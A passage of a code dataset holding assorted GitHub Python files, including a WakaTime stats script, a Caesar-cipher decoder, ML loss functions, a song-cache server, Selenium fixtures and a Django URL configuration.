minutes\")\n \n with open('coding_stats_{date}.json', 'w') as f:\n json.dump(data, f)\n print(\"Data saved to coding_stats.json\")\n else:\n print(\"No coding data found for the given date.\")\n else:\n print(\"Failed to retrive coding stats.\")\n\ndef get_all_stats():\n params = {\n\n }\n\n response = requests.get('https://wakatime.com/api/v1/users/current/stats/last_year', headers=headers, params=params)\n \n if response.status_code == 200:\n data = response.json()\n if 'data' in data:\n with open('coding_stats_all_.json', 'w') as f:\n json.dump(data, f)\n print(\"Data saved to coding_stats_all_.json\")\n else:\n print(\"No coding data found\")\n else:\n print(\"Failed to retrive coding stats.\")\n\ntoday = datetime.date.today().strftime(\"%Y-%m-%d\")\n\nget_daily_stats()\nget_all_stats()\n","repo_name":"debasish-dutta/Wakatime-stats-log","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25277463393","text":"import enchant \nfrom caesarcipher import CaesarCipher \n\nd = enchant.Dict(\"en_US\")\n\nwith open(\"caesar.enc\") as f: \n enc = f.readline().rstrip()\n\n flags = []\n\n for i in range(1,26):\n flag = CaesarCipher(enc,offset=i).decoded\n\n score = 0 \n for word in flag.split(): \n if d.check(word):\n score += 1 \n flags.append((score,flag))\n\n flags.sort(reverse=True)\n for flag in flags:\n print(f\"{flag[0]}: {flag[1]}\")\n \n","repo_name":"Qdog31/C3T-Practice","sub_path":"Crypto_Practice/caesarcrack.py","file_name":"caesarcrack.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17321476464","text":"import sys, argparse, os, shutil\nfrom uiplib.constants import CURR_DIR, PICS_FOLDER\nfrom uiplib.scheduler import scheduler\n\ndef main():\n print(\"Hey this is UIP! you can use it to download\"\n \" images from reddit and also to schedule the setting of these\"\n \" images as your desktop wallpaper.\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--offline\", action=\"store_true\",\n help=\"Runs UIP in offline mode.\")\n parser.add_argument(\"--flush\", action=\"store_true\",\n help=\"Delete all downloaded wallpapers\"\n \" and downloads new ones. \"\n \"When combined with --offline,\"\n \" deletes the wallpapers and exits.\")\n args = parser.parse_args()\n try:\n if args.offline:\n print(\"You have choosen to run UIP in offline mode.\")\n if args.flush:\n print(\"Deleting all downloaded wallpapers...\")\n try:\n shutil.rmtree(os.path.join(CURR_DIR, PICS_FOLDER))\n os.mkdir(os.path.join(CURR_DIR, PICS_FOLDER))\n except FileNotFoundError:\n pass\n if not args.offline:\n print(\"UIP will now connect to internet and download images\"\n \" from reddit.\")\n scheduler(args.offline)\n except KeyboardInterrupt:\n sys.exit(0)\n","repo_name":"teja-315/UIP","sub_path":"uiplib/UIP.py","file_name":"UIP.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"35077450810","text":"import mindspore.nn as nn\nimport mindspore.ops as P\nfrom mindspore.common import dtype as mstype\nfrom mindspore.nn.loss.loss import LossBase\n\nfrom src.utils.tools import ConfigS3DIS as cfg\n\n\nclass WeightCEloss(LossBase):\n \"\"\"weight ce loss\"\"\"\n\n def __init__(self, weights, num_classes):\n super(WeightCEloss, self).__init__()\n self.weights = weights\n self.num_classes = num_classes\n self.onehot = nn.OneHot(depth=num_classes)\n self.ce = nn.SoftmaxCrossEntropyWithLogits(sparse=False)\n\n def construct(self, logits, labels, valid_idx):\n logits = logits.swapaxes(-2, -1).reshape((-1, self.num_classes))\n one_hot_label = self.onehot(labels) # [2b*n, 13]\n weights = self.weights * one_hot_label # [2b*n, 13]\n weights = P.ReduceSum()(weights, 1)*valid_idx # [2b*n]\n logit = P.cast(logits, mstype.float32)\n one_hot_label = P.cast(one_hot_label, mstype.float32)\n unweighted_loss = self.ce(logit, one_hot_label) # [2b*n]\n weighted_loss = unweighted_loss * weights * valid_idx # [2b*n]\n cnt_valid = P.ReduceSum()(valid_idx.astype(mstype.float32))\n CE_loss = P.ReduceSum()(weighted_loss) / cnt_valid # [1]\n\n return CE_loss\n\n\nclass JSLoss(LossBase):\n \"\"\"Jensen-Shannon divergence\"\"\"\n\n def __init__(self, b):\n super(JSLoss, self).__init__()\n self.b = b\n self.softmax = nn.Softmax(axis=-1)\n self.norm = nn.Norm(axis=-1, keep_dims=False)\n\n def construct(self, logits):\n logits = logits.swapaxes(-2, -1)\n # logits = self.softmax(logits)\n logits_clean = logits[:self.b, :, :].reshape(-1, logits.shape[-1])\n logits_noise = logits[self.b:, :, :].reshape(-1, logits.shape[-1])\n p1 = P.cast(logits_clean, mstype.float32)\n p2 = P.cast(logits_noise, mstype.float32)\n # q = 1/2*(p1+p2)\n # loss_kl = p1 * P.Log()(p1/(q+1e-4)+1e-4) + p2 * P.Log()(p2/(q+1e-4)+1e-4)\n loss_cos = (1-P.ReduceSum()(p1*p2, -1)/(self.norm(p1)*self.norm(p2)))*10\n\n return P.ReduceMean(keep_dims=False)(loss_cos)\n\n\nclass CRLoss(LossBase):\n \"\"\"CR loss\"\"\"\n\n def __init__(self, num_classes):\n super(CRLoss, self).__init__()\n self.onehot = nn.OneHot(depth=num_classes)\n self.relu = nn.ReLU()\n\n def construct(self, rs1, rs2, labels):\n label_pool_one_hot = self.onehot(labels)\n Afinite_hot = P.matmul(label_pool_one_hot, P.Transpose()(label_pool_one_hot, (1, 0)))\n\n rs_map_soft = P.matmul(rs1, P.Transpose()(rs2, (1, 0)))\n rs_map_soft = self.relu(rs_map_soft)\n rs_map_soft = P.clip_by_value(rs_map_soft, 1e-4, 1-(1e-4))\n Afinite = Afinite_hot.reshape([-1, 1])\n rs_map = rs_map_soft.reshape([-1, 1])\n loss_cr = -1.0 * P.ReduceMean()(Afinite * P.Log()(rs_map) +\n (1 - Afinite) * P.Log()(1 - rs_map))\n A_R = P.ReduceSum()(Afinite_hot * rs_map_soft, 1)\n loss_tjp = -1.0 * P.ReduceMean()(P.Log()(P.Div()(A_R, P.ReduceSum()(rs_map_soft, 1))))\n loss_tjr = -1.0 * P.ReduceMean()(P.Log()(P.Div()(A_R, P.ReduceSum()(Afinite_hot, 1))))\n\n return loss_cr + loss_tjp + loss_tjr\n\n\nclass PSDWithLoss(nn.Cell):\n \"\"\"PSD-net with loss\"\"\"\n\n def __init__(self, network, weights, num_classes, ignored_label_inds, is_training):\n super(PSDWithLoss, self).__init__()\n self.network = network\n self.num_classes = num_classes\n self.ignored_label_inds = ignored_label_inds\n self.is_training = is_training\n self.b = cfg.batch_size\n self.ce_loss = WeightCEloss(weights, num_classes)\n self.kl_loss = JSLoss(cfg.batch_size)\n # self.cr_loss = CRLoss(num_classes)\n\n def construct(self, feature, aug_feature, labels, input_inds, cloud_inds,\n p0, p1, p2, p3, p4, n0, n1, n2, n3, n4, pl0, pl1, pl2,\n pl3, pl4, u0, u1, u2, u3, u4):\n # handle input\n xyz = [p0, p1, p2, p3, p4]\n neighbor_idx = [n0, n1, n2, n3, n4]\n sub_idx = [pl0, pl1, pl2, pl3, pl4]\n interp_idx = [u0, u1, u2, u3, u4]\n\n # forward\n logits, _, _ = self.network(\n xyz, feature, aug_feature, neighbor_idx, sub_idx, interp_idx)\n\n global_labels = P.Concat(0)([labels, labels])\n global_labels = global_labels.reshape((-1,)) # [2b, n] --> [2b*n]\n labels = labels.reshape((-1,)) # [b, n] --> [b*n]\n\n # generate valid index for valid logits and labels selection for loss compute. due to the lack operator of mindspore.\n # (B*N,)\n ignore_mask = P.zeros_like(global_labels).astype(mstype.bool_) # [b*n]\n for ign_label in self.ignored_label_inds:\n ignore_mask = P.logical_or(\n ignore_mask, P.Equal()(global_labels, ign_label))\n\n # Collect logits and labels that are not ignored\n valid_idx = P.logical_not(ignore_mask).astype(mstype.int32) # [b*n]\n\n # compute loss\n ce_loss = self.ce_loss(logits, global_labels, valid_idx)\n kl_loss = self.kl_loss(logits)\n # cr_loss = self.cr_loss(rs1, rs2, global_valid_labels)\n\n loss = ce_loss + kl_loss # + cr_loss\n\n return loss\n\n\ndef get_param_groups(network):\n \"\"\"Param groups for optimizer.\"\"\"\n decay_params = []\n no_decay_params = []\n for x in network.trainable_params():\n parameter_name = x.name\n if parameter_name.endswith('.bias'):\n # all bias not using weight decay\n no_decay_params.append(x)\n elif parameter_name.endswith('.gamma'):\n # bn weight bias not using weight decay, be carefully for now x not include BN\n no_decay_params.append(x)\n elif parameter_name.endswith('.beta'):\n # bn weight bias not using weight decay, be carefully for now x not include BN\n no_decay_params.append(x)\n else:\n decay_params.append(x)\n\n return [{'params': no_decay_params, 'weight_decay': 0.0}, {'params': decay_params}]\n","repo_name":"NotACracker/PSD_mindspore","sub_path":"src/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71773164349","text":"import os\nimport json\nimport aiocron\nimport asyncio\nimport logging\nimport random as rand\nfrom dotenv import load_dotenv\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom util.web.cache import buildRandomCache, buildTopSongCache, buildTopSongTikTokCache\n\n#########################################################################################################\n# Global definitions\n\nlogging.basicConfig(format='%(levelname)s: %(asctime)s - %(name)s.%(funcName)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ntry:\n load_dotenv()\n HOSTNAME = os.getenv('WEB_SCRAPER_HOSTNAME')\n PORT = os.getenv('WEB_SCRAPER_PORT')\nexcept Exception as ex:\n logger.critical('Failed to retrieve environment variables. Please verify environment variable exists')\n logger.critical(str(ex))\n exit(1)\n\nRANDOM_SONG_CACHE = []\nTOP_SONG_US_CACHE = None\nTOP_SONG_GLOBAL_CACHE = None\nTOP_SONG_TIKTOK_CACHE = None\n\n#########################################################################################################\n# Server class\n\nclass Server(BaseHTTPRequestHandler):\n def set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n def do_HEAD(self):\n self.set_headers()\n\n def do_GET(self):\n logger.info(f'Received GET request - Path: {self.path}')\n self.set_headers()\n\n if '/get_random_song' == self.path:\n randomIndex = rand.randint(0, len(RANDOM_SONG_CACHE) - 1)\n randomSongIndex = rand.randint(0, len(RANDOM_SONG_CACHE[randomIndex]) - 1)\n randomSong = RANDOM_SONG_CACHE[randomIndex][randomSongIndex]\n response = json.dumps({'random': randomSong.__dict__})\n self.wfile.write(response.encode('utf-8'))\n elif '/get_top_song' == self.path:\n response = json.dumps({'us': TOP_SONG_US_CACHE.__dict__, 'global': TOP_SONG_GLOBAL_CACHE.__dict__})\n logger.info(f'Response: {response}')\n self.wfile.write(response.encode('utf-8'))\n elif '/get_tiktok_song' == self.path:\n response = json.dumps({'tiktok': TOP_SONG_TIKTOK_CACHE.__dict__})\n logger.info(f'Response: {response}')\n self.wfile.write(response.encode('utf-8'))\n\n#########################################################################################################\n# Generates random song cache daily\n\n@aiocron.crontab('0 0 */1 * *')\nasync def randomSongCache():\n global RANDOM_SONG_CACHE\n RANDOM_SONG_CACHE = await buildRandomCache()\n\n#########################################################################################################\n# Generates random song cache hourly\n\n@aiocron.crontab('0 */1 * * *')\nasync def topSongCache():\n global TOP_SONG_US_CACHE\n global TOP_SONG_GLOBAL_CACHE\n global TOP_SONG_TIKTOK_CACHE\n\n try:\n TOP_SONG_TIKTOK_CACHE = await buildTopSongTikTokCache()\n TOP_SONG_US_CACHE = await buildTopSongCache('regional', 'us')\n TOP_SONG_GLOBAL_CACHE = await buildTopSongCache('regional', 'global')\n except Exception as ex:\n logger.error('Unknown exception caught building cache at cron job')\n logger.error(str(ex))\n\n#########################################################################################################\n# Builds random and top songs cache\n\nasync def buildSongCache():\n global RANDOM_SONG_CACHE\n global TOP_SONG_US_CACHE\n global TOP_SONG_GLOBAL_CACHE\n global TOP_SONG_TIKTOK_CACHE\n\n try:\n RANDOM_SONG_CACHE = await buildRandomCache()\n TOP_SONG_TIKTOK_CACHE = await buildTopSongTikTokCache()\n TOP_SONG_US_CACHE = await buildTopSongCache('regional', 'us')\n TOP_SONG_GLOBAL_CACHE = await buildTopSongCache('regional', 'global')\n except Exception as ex:\n logger.error('Unknown exception caught building cache at startup')\n logger.error(str(ex))\n\n#########################################################################################################\n# Server startup handler\n\nasync def run():\n server = HTTPServer((HOSTNAME, int(PORT)), Server)\n logger.info('Server is up and listening')\n logger.info(f'Port: {PORT}')\n await buildSongCache()\n\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n pass\n\n server.server_close()\n logger.info('Server stopped')\n\n#########################################################################################################\n# Server startup\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n task = [loop.create_task(run())]\n loop.run_until_complete(asyncio.wait(task))\n loop.close()","repo_name":"beavelar/shuffle","sub_path":"web-scraper/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26703844025","text":"import time\n\n\nclass GameSerializer:\n def __init__(self, dir_name, buffer_size=1000):\n self.rows = []\n self.buffer_size = buffer_size\n self.file_name = \"../replays/\" + dir_name + \"/game.csv\"\n\n def write_header(self, field, traps, player_data):\n with open(self.file_name, \"a\") as f:\n f.write(str(field) + \"\\n\")\n f.write(str(traps) + \"\\n\")\n f.write(str(player_data) + \"\\n\")\n\n def add_events(self, events):\n t = time.time()\n self.rows.append((t, [x.encode() for x in events]))\n if len(self.rows) > self.buffer_size:\n with open(self.file_name, \"a\") as f:\n for row in self.rows:\n f.write(\";\".join([str(x) for x in row]) + \"\\n\" )\n self.rows = []\n","repo_name":"LanyK/TheAngerGames","sub_path":"bombangerman/server/GameSerializer.py","file_name":"GameSerializer.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32237771252","text":"from selenium import webdriver\nimport pytest\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\n\n\n@pytest.fixture(scope='class')\ndef init_chromedriver(request):\n chrome_driver = webdriver.Chrome(ChromeDriverManager().install())\n request.cls.driver = chrome_driver\n yield\n chrome_driver.quit()\n\n\n@pytest.fixture(scope='class')\ndef init_geckodriver(request):\n gecko_driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n request.cls.driver = gecko_driver\n yield\n gecko_driver.quit()\n\n\n@pytest.fixture(scope='class')\ndef init_edgedriver(request):\n edge_driver = webdriver.Edge(executable_path=EdgeChromiumDriverManager().install())\n request.cls.driver = edge_driver\n yield\n edge_driver.quit()\n\n\n@pytest.mark.usefixtures(\"init_geckodriver\")\nclass Test_Parent:\n pass\n\n\nclass Test_Child(Test_Parent):\n\n def test_get_title(self):\n self.driver.get(\"http://www.google.com/\")\n assert self.driver.title == \"Google\"\n\n def test_get_url(self):\n assert self.driver.current_url == \"https://www.google.com/?gws_rd=ssl\"","repo_name":"arnab07das/Selenium-Python-Sessions","sub_path":"PytestSessions/test_fixtures_class.py","file_name":"test_fixtures_class.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2429310858","text":"from __future__ import division\r\nimport re\r\nimport math\r\nimport operator\r\nimport collections\r\nimport ujson\r\nfrom stemming import porter2\r\nfrom collections import Counter\r\n\r\ndef tokenize(text):\r\n tokens = re.findall(\"[\\w']+\", text.lower())\r\n return [porter2.stem(token) for token in tokens]\r\n\r\ndef read_movies(filename):\r\n file = open(filename)\r\n for line in file:\r\n yield ujson.loads(line)\r\n file.close()\r\n\r\nclass vector(object):\r\n\r\n def __init__(self):\r\n self.movie_vectors = dict()\r\n self.total = 0\r\n\r\n def vectorize_plot(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n plot phrases\r\n parameters:\r\n movies - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'plot_simple' in movie:\r\n plot = tokenize(movie['plot_simple'])\r\n rating = movie['rating']\r\n ratingcount = movie['rating_count']\r\n plot_vector = dict()\r\n count = 0\r\n for word in plot:\r\n plot_vector[word] = len(word)/(((rating)*math.log(ratingcount,10))/math.log(self.total,15))\r\n count += 1\r\n\r\n return plot_vector\r\n else:\r\n return {}\r\n\r\n def vectorize_actor(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n actors\r\n parameters:\r\n movies - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n\r\n if 'actors' in movie:\r\n actors = movie['actors']\r\n ratingcount = movie['rating_count']\r\n rating = movie['rating']\r\n actor_vector = dict()\r\n count = 0\r\n for actor in actors:\r\n alpha = math.exp(-ratingcount)\r\n actor_vector[actor] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n\r\n return actor_vector\r\n else:\r\n return {}\r\n\r\n def vectorize_writer(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n writers\r\n parameters:\r\n movies - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'writers' in movie:\r\n writers = movie['writers']\r\n rating = movie['rating']\r\n ratingcount = movie['rating_count']\r\n writers_vector = dict()\r\n count = 0\r\n for writer in writers:\r\n writers_vector[writer] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n\r\n return writers_vector\r\n else:\r\n return {}\r\n\r\n def vectorize_director(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n directors\r\n parameters:\r\n movie - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'directors' in movie:\r\n directors = movie['directors']\r\n ratingcount = movie['rating_count']\r\n rating = movie['rating']\r\n directors_vector = dict()\r\n count = 0\r\n for director in directors:\r\n directors_vector[director] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n \r\n return directors_vector\r\n else:\r\n return {}\r\n def vectorize_genre(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n directors\r\n parameters:\r\n movie - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'genres' in movie:\r\n genres = movie['genres']\r\n rating = movie['rating']\r\n genre_vector = dict()\r\n ratingcount = movie['rating_count']\r\n count = 0\r\n for genre in genres:\r\n genre_vector[genre] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n \r\n return genre_vector\r\n else:\r\n return {}\r\n\r\n\r\n def vectorize(self,movies,collection,collection_name):\r\n\r\n \"\"\"\r\n purpose: read the movies and turn them into vectors of\r\n actors, writers, directors, and plot\r\n parameters:\r\n movies - an iterator of movie dictionaries\r\n returns: none\r\n \"\"\"\r\n movie_vectors = {}\r\n ratingmax = 0\r\n\r\n tempmovies = read_movies('mv.json')\r\n \r\n for movie in tempmovies:\r\n if 'rating_count' in movie:\r\n if movie['rating_count'] > ratingmax:\r\n ratingmax = movie['rating_count']\r\n\r\n self.total = ratingmax\r\n \r\n for movie in movies:\r\n if 'imdb_id' and 'rating_count' in movie:\r\n movie_id = movie['imdb_id']\r\n movie_rating = -1.0\r\n if 'rating' in movie:\r\n movie_rating = movie['rating']\r\n \r\n movie_dict = {}\r\n movie_dict['title'] = movie['title']\r\n movie_dict['actors'] = self.vectorize_actor(movie)\r\n movie_dict['writers'] = self.vectorize_writer(movie)\r\n movie_dict['directors'] = self.vectorize_director(movie)\r\n movie_dict['plot'] = self.vectorize_plot(movie)\r\n movie_dict['genres'] = self.vectorize_genre(movie)\r\n ratingcount = movie['rating_count']\r\n movie_dict['rating'] = movie['rating']\r\n #print \r\n #print \"OLD: \", movie_rating\r\n #movie_dict['rating'] = ((movie_rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n #print \"RATINGC\", ratingcount\r\n #print \"NEW: \" , movie_dict['rating']\r\n #print\r\n movie_dict['rating_count'] = movie['rating_count'] \r\n \r\n #movie_dict['plot'] = self.vectorize_plot(movie)\r\n \r\n movie_vectors[movie_id] = movie_dict\r\n if collection_name == 'training':\r\n d = dict(\r\n info = movie,\r\n imdb_id = movie_id\r\n )\r\n collection.insert(d)\r\n\r\n return movie_vectors\r\n\r\n\r\n\r\n","repo_name":"perozol/termahterPicker","sub_path":"vectorization.py","file_name":"vectorization.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31627759906","text":"from django.conf.urls import url, include\nfrom EmployeeApp import views\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom rest_framework import routers\n\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView, TokenVerifyView\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\n\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls')),\n url(r'^login/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n url(r'^token/refresh', TokenRefreshView.as_view(), name='token_refresh'),\n url(r'^token/verify/', TokenVerifyView.as_view(), name='token_verify'),\n\n url(r'^department/$', views.departmentApi),\n url(r'^department/([0-9]+)$', views.departmentApi),\n\n url(r'^employee/$', views.employeeApi),\n url(r'^employee/([0-9]+)$', views.employeeApi),\n\n url(r'^basicInformations/publish/$', views.publish_basic_information),\n url(r'^basicInformations/$', views.basicInformationApi),\n url(r'^basicInformations/([0-9]+)$', views.basicInformationApi),\n\n # url(r'^departmentInformations/publish/$', views.publish_department_information),\n url(r'^subdivisions/$', views.subdivisions),\n url(r'^subdivisions/format/$', views.subdivisionsFormat),\n url(r'^subdivisions/([1-9][0-9]*)$', views.subdivisions_by_id),\n url(r'^subdivisions/publish/$', views.subdivisions_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^basic_informations/$', views.basic_informations),\n url(r'^basic_informations/format/$', views.basic_informationsFormat),\n url(r'^basic_informations/([1-9][0-9]*)$', views.basic_informations_by_id),\n url(r'^basic_informations/publish/$', views.basic_informations_publish),\n\n url(r'^founders/$', views.founders),\n url(r'^founders/format/$', views.foundersFormat),\n url(r'^founders/([1-9][0-9]*)$', views.founders_by_id),\n url(r'^founders/publish/$', views.founders_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^filiations/$', views.filiations),\n url(r'^filiations/format/$', views.filiationsFormat),\n url(r'^filiations/([1-9][0-9]*)$', views.filiations_by_id),\n url(r'^filiations/publish/$', views.filiations_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^representations/$', views.representations),\n url(r'^representations/format/$', views.representationsFormat),\n url(r'^representations/([1-9][0-9]*)$', views.representations_by_id),\n url(r'^representations/publish/$', views.representations_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^managements/$', views.managements),\n url(r'^managements/format/$', views.managementsFormat),\n url(r'^managements/([1-9][0-9]*)$', views.managements_by_id),\n url(r'^managements/publish/$', views.managements_publish),\n\n url(r'^volumes/$', views.volumes),\n url(r'^volumes/format/$', views.volumesFormat),\n url(r'^volumes/([1-9][0-9]*)$', views.volumes_by_id),\n url(r'^volumes/publish/$', views.volumes_publish),\n\n url(r'^rushs/$', views.rushs),\n url(r'^rushs/format/$', views.rushsFormat),\n url(r'^rushs/([1-9][0-9]*)$', views.rushs_by_id),\n url(r'^rushs/publish/$', views.rushs_publish),\n\n url(r'^vacs/$', views.vacs),\n url(r'^vacs/format/$', views.vacsFormat),\n url(r'^vacs/([1-9][0-9]*)$', views.vacs_by_id),\n url(r'^vacs/publish/$', views.vacs_publish),\n # ---------------------------------------------------------\n url(r'^leaders/$', views.leaders),\n url(r'^leaders/format/$', views.leadersFormat),\n url(r'^leaders/([1-9][0-9]*)$', views.leaders_by_id),\n url(r'^leaders/publish/$', views.leaders_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^leadersTwo/$', views.leadersTwos),\n url(r'^leadersTwo/format/$', views.leadersTwosFormat),\n url(r'^leadersTwo/([1-9][0-9]*)$', views.leadersTwos_by_id),\n url(r'^leadersTwo/publish/$', views.leadersTwos_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^filialLeaders/$', views.filialLeaders),\n url(r'^filialLeaders/format/$', views.filialLeadersFormat),\n url(r'^filialLeaders/([1-9][0-9]*)$', views.filialLeaders_by_id),\n url(r'^filialLeaders/publish/$', views.filialLeaders_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^teachers/$', views.teachers),\n url(r'^teachers/format/$', views.teachersFormat),\n url(r'^teachers/([1-9][0-9]*)$', views.teachers_by_id),\n url(r'^teachers/publish/$', views.teachers_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^standartCopies/$', views.standartCopies),\n url(r'^standartCopies/format/$', views.standartCopiesFormat),\n url(r'^standartCopies/([1-9][0-9]*)$', views.standartCopies_by_id),\n url(r'^standartCopies/publish/$', views.standartCopies_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^standartCopiestwos/$', views.standartCopiestwos),\n url(r'^standartCopiestwos/format/$', views.standartCopiestwosFormat),\n url(r'^standartCopiestwos/([1-9][0-9]*)$', views.standartCopiestwos_by_id),\n url(r'^standartCopiestwos/publish/$', views.standartCopiestwos_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^paidServices/$', views.paidServices),\n url(r'^paidServices/format/$', views.paidServicesFormat),\n url(r'^paidServices/([1-9][0-9]*)$', views.paidServices_by_id),\n url(r'^paidServices/publish/$', views.paidServices_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^plats/$', views.plats),\n url(r'^plats/format/$', views.platsFormat),\n url(r'^plats/([1-9][0-9]*)$', views.plats_by_id),\n url(r'^plats/publish/$', views.plats_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docas/$', views.docas),\n url(r'^docas/format/$', views.docasFormat),\n url(r'^docas/([1-9][0-9]*)$', views.docas_by_id),\n url(r'^docas/publish/$', views.docas_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docbs/$', views.docbs),\n url(r'^docbs/format/$', views.docbsFormat),\n url(r'^docbs/([1-9][0-9]*)$', views.docbs_by_id),\n url(r'^docbs/publish/$', views.docbs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^doccs/$', views.doccs),\n url(r'^doccs/format/$', views.doccsFormat),\n url(r'^doccs/([1-9][0-9]*)$', views.doccs_by_id),\n url(r'^doccs/publish/$', views.doccs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docds/$', views.docds),\n url(r'^docds/format/$', views.docdsFormat),\n url(r'^docds/([1-9][0-9]*)$', views.docds_by_id),\n url(r'^docds/publish/$', views.docds_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^doces/$', views.doces),\n url(r'^doces/format/$', views.docesFormat),\n url(r'^doces/([1-9][0-9]*)$', views.doces_by_id),\n url(r'^doces/publish/$', views.doces_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docfs/$', views.docfs),\n url(r'^docfs/format/$', views.docfsFormat),\n url(r'^docfs/([1-9][0-9]*)$', views.docfs_by_id),\n url(r'^docfs/publish/$', views.docfs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docgs/$', views.docgs),\n url(r'^docgs/format/$', views.docgsFormat),\n url(r'^docgs/([1-9][0-9]*)$', views.docgs_by_id),\n url(r'^docgs/publish/$', views.docgs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^dochs/$', views.dochs),\n url(r'^dochs/format/$', views.dochsFormat),\n url(r'^dochs/([1-9][0-9]*)$', views.dochs_by_id),\n url(r'^dochs/publish/$', views.dochs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docis/$', views.docis),\n url(r'^docis/format/$', views.docisFormat),\n url(r'^docis/([1-9][0-9]*)$', views.docis_by_id),\n url(r'^docis/publish/$', views.docis_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docjs/$', views.docjs),\n url(r'^docjs/format/$', views.docjsFormat),\n url(r'^docjs/([1-9][0-9]*)$', views.docjs_by_id),\n url(r'^docjs/publish/$', views.docjs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docks/$', views.docks),\n url(r'^docks/format/$', views.docksFormat),\n url(r'^docks/([1-9][0-9]*)$', views.docks_by_id),\n url(r'^docks/publish/$', views.docks_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', 